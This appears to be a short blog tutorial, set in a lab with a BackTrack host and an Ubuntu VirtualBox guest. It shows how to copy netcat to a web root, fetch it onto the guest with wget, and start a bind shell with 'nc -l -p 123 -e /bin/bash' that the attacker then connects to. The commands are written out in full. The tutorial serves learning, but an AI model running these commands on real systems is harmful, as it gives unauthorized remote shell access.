1. Open on terminal Backtrack and type
root@bt:~# whereis nc
nc: /bin/nc /bin/nc.traditional /usr/share/man/man1/nc.1.gz
2. Copy file /bin/nc to folder var/www
root@bt:~# cp /bin/nc /var/www
3. Open Ubuntu on Vbox and then open terminal and type
$ wget 192.168.56.1/nc
4. Try type ls
5. check and type
$ ls -lia nc
6. Change and type
$ chmod 777 nc
7. after the check it will be changed
8. Still in the Ubuntu terminal to proccess listen, type on
$ sudo ./nc -l -p 123 -e /bin/bash
9. Remote in Backtrack terminal
root@bt:~# nc 192.168.56.101 123
-
Slack space is a form of internal fragmentation, i.e. wasted space, on a hard disk. When a file is written to disk it’s stored at the “begin...
-
Hey guys,, In the night, i will be writting tutorial about Attack Vektor on BeEF+Metasploit. Yesterday, i was written first about BeEF and ...
-
1. first you have to search or scan host that will be targeted 2. Start the the nessus, make sure the service has gone the way of open th...
Subscribe to:
Post Comments (Atom)
Slack Space
Slack space is a form of internal fragmentation, i.e. wasted space, on a hard disk. When a file is written to disk it’s stored at the “begin...
No comments:
Post a Comment